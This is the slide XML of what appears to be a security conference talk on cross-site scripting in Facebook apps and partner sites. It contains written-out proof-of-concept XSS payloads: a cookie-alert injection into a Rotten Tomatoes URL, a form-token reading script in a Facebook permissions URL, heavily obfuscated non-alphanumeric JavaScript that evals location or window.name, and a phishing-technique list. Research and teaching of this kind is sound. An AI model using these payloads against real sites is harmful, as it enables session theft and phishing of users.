                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>But:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Segoe UI Semibold" pitchFamily="34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endParaRPr lang="en-US" sz="6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1750" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://www.rottentomatoes.com/m/live_free_or_die_hard/news/1648085/',alert(document.cookie),x='/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="175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Instant Personalization Sites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19375"/>
            <a:ext cx="4905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124200"/>
            <a:ext cx="64087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581400"/>
            <a:ext cx="6305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114800"/>
            <a:ext cx="64277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  <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rotten Tomatoes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XSS trend: overlooking other contexts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XSS trend: problems from third-party code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="175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Instant Personalization Sites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XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>trend: secondary pages vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/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Instant Personalization Sites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Today’s theme: Facebook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Familiar cases for me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Wide range of examples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Representative of mash-ups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Three types of Facebook apps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FBML/FBJS: App output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>proxied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/filtered by Facebook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Canvas: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> within Facebook domain/chrome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External site: Facebook APIs used on outside domain</a:t>
            </a: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Meet the Facebook Platform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http://www.facebook.com/connect/prompt_permissions.php?</a:t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api_key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=2b84359cad5a9ab45bb801a22ae0ef63&amp;v=1.0&amp;extern=1&amp;next=&amp;channel_url=&amp;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dialog_id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=0_0.37541312664788107&amp;</a:t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ext_perm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20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&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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(</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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%22post_form_id%22).value)&lt;/script&gt;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&amp;locale=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en_US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Speaking of Secondary Pages…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err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Facebook’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ServerFBML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> feature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facebook.com URL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No page chrome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Most FBML/FBJS allowed</a:t>
            </a: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The Difficulty of Blacklisting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33800"/>
            <a:ext cx="5181600" cy="265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The Difficulty of Blacklisting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/>
        <p:txBody>
          <a:bodyPr lIns="182880" tIns="182880" rIns="182880" bIns="182880"/>
          <a:lstStyle/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1. Render a Facebook page in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to identify user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2. Render an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OAuth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> redirect to identify user or for phishing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3. Render an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fb:redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OAuth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> redirect to identify user via referrer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4. Render an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fb:swf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to identify user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5. Render fake login using &lt;form&gt; for phishing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6. Render a form to apps.facebook.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>abcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>evilapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> for 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lIns="182880" tIns="182880" rIns="182880" bIns="182880"/>
          <a:lstStyle/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7. Render fake login using &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fb:request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-form&gt; and AJAX for phishing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8. Render FBJS with AJAX to identify user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9. Render a password input using FBJS for phishing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10. Render a fake password input using FBJS for phishing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11. Render an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> using FBJS to identify user or for phishing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Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>12. Render an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fb:swf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> using FBJS to identify user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Segoe UI Semi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Variable names can be Unicode or certain symbols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_, $, °, ª, þ, ð, µ, ƒ, æ, ø, Á, È, Ç, Ñ, etc.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Dynamic, weak typing; can freely type-convert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x = +'2', y = !0	// x + 1 == 3, y == true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Arrays and objects become strings in concatenation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x = [1] + [true]	// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="-10" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>x ==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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="-10" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1true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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="-10" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, (1) + (true) == 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" spc="-10" dirty="0" smtClean="0">
              <a:latin typeface="Segoe UI Semibold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Strings can be treated as arrays of letters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x = 'test'		// x[0] == 't', x[1] == 'e', etc.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Array notation can be used for methods/properties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x = window['alert'] 	// x(1) ==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window.alert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(1)</a:t>
            </a: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Non-Alphanumeric JavaScript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Payload can use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window.name</a:t>
            </a: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 or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location.hash</a:t>
            </a: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 to load more scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef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#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javascript:alert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(1)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(æ=([µ,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ð,,,,Ñ,,Å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]=[ƒ=!'']+ƒ/!ƒ,[[,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Á,ª,$,,,ø,,,,Ç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]=!ƒ+{}]</a:t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[$+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ø+ð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+µ])())[_=ª+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ø+Ç+Á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+µ+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Å+ø+Ñ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]=/[^#]+$/(æ[_])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef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#*/alert(1)//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eval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r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>W=[Z={}+[],O=Z[D=-~Z],Y=D[X=!D+O]+O,N=O+Y[D],L=X[++D],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pl-PL" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C=Z[K=D+++D],T=C+X[D/D]+Z[D+D]][C+N+T],(H=W()[+[]])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pl-PL" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[(J='/*'+H[L+O+T+Y[K]+N])[X[D]+L+Y[K]+C+Y[D]](~D)](J)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Non-Alphanumeric JavaScript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>
            <a:normAutofit fontScale="4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5500" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>First attempt – 8 characters: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5500" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[]+,!()/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	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[],[][(![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+![]]])()[(!![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+[]+(!![]+!![]+!![]+!![]+!![]+!![]+!![])]+(![]+[])[+!![]]+(![]+[])[!![]+!![]]](([]+([],[][(![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+![]]])()[(![]+[])[!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+![]]+([][+[]]+[])[!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+([][+[]]+[])[+!![]]])[(![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]]+([][+[]]+[])[!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]]((+!![]/+([]+(+!![])+(+!![])+(+!![])+(+!![])+(+!![])+(+!![])+(+!![]))+[])[(+!![])+[]+(!![]+!![]+!![]+!![]+!![]+!![]+!![])]+(!![]+!![]))+([],[][(![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+![]]])()[(![]+[])[!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+![]]+([][+[]]+[])[!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+([][+[]]+[])[+!![]]])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5500" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Executes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>((''+location).slice(-2)+location)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="5500" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5500" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5500" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://www.victim.com/#*/alert(1)//*</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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The Great JS Wall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Reduced to 7 characters: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[]+,!()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6-character sets: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[]+!()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[]+=()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[]+=/_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And that’s the Wall!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The Great JS Wall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Segoe UI Semibold" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Original code with set of 8 was 2,084 characters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Segoe UI Semibold" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>First attempt with set of 6 was 3,767 characters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Segoe UI Semibold" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>After refinement and optimization, the shortest attempt so far with a set of 6 (caveat: Firefox-only) has…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Segoe UI Semibold" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Only 460 characters!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latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	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[___=[[_=[]]==_]+_[__=/_/+_]][_____=[_____=__[++_]+__[_]]+[/_/[_______=[______=[____=[__=[_==_]+_[_]][___[+[]]+___[_+[+[]]]+___[++_]+__[+[]]+__[++_]+__[_/_]]+_][+[]][_]]+[____=____[_+_]]+___[_+_]+___[_]+__[+[]]+__[_/_]+__[++_]+______+__[+[]]+____+__[_/_]]+_][+[]][_/_+[_]]+___[_=_/_]+__[_++]+__[++_]+___[_+_]+__[_=+[]]+_____][___[++_+_]+____+______+___[_]+__[+[]]+___[_+[+[]]]+____+___[++_+_+_]]=[__=_[_______]+_][_____][__[_]+___[_/_]+__[_/_+[_/_]]+___[_+_]]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Segoe UI Semibold" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Executes: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[]['__parent__']['location']=[]['__parent__']['name']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The Great JS Wall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  <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="28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eval</a:t>
            </a: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location.hash</a:t>
            </a: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Client-side JavaScript uses client-side parameter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Payload is never sent to the server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Increasingly common with “Ajax” web apps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DOM-Based XSS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Facebook Mobile site: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http://touch.facebook.com/#profile.php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What about…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8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http://touch.facebook.com/#http://example.com/xss.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Segoe UI Semibold" pitchFamily="34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endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Segoe UI Semibold" pitchFamily="34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endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Segoe UI Semibold" pitchFamily="34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endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Segoe UI Semibold" pitchFamily="34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endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              <a:cs typeface="Consolas" pitchFamily="49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2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>								    (Austin)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DOM-Based XSS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5726229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a.k.a. HTML Injection, Web Content Injection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Code injection targeting the client side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Essentially, XSS lets an attacker modify the source code of a web app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“XSS flaws occur whenever an application takes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and sends it to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>without proper validation and escaping.”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>
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tl;dr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: The browser renders code that it shouldn’t.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Meet Cross-Site Scripting (XSS)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err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is (still) my hero…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Recent Facebook worm used XSS to post links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Some Facebook scammers using self-inflicted XSS to harvest profile information, send links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We’ll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>likely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>see many more XSS-based attacks</a:t>
            </a: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The Future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8610600" cy="1676400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This document by Joey Tyson (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>theharmonyguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) is licensed under a Creative           Commons Attribution-Noncommercial-Share Alike 3.0 United States License.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> for details.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://theharmonyguy.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold"/>
              </a:rPr>
              <a:t>▪    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold"/>
              </a:rPr>
              <a:t>http://twitter.com/theharmonyguy</a:t>
            </a:r>
            <a:r>
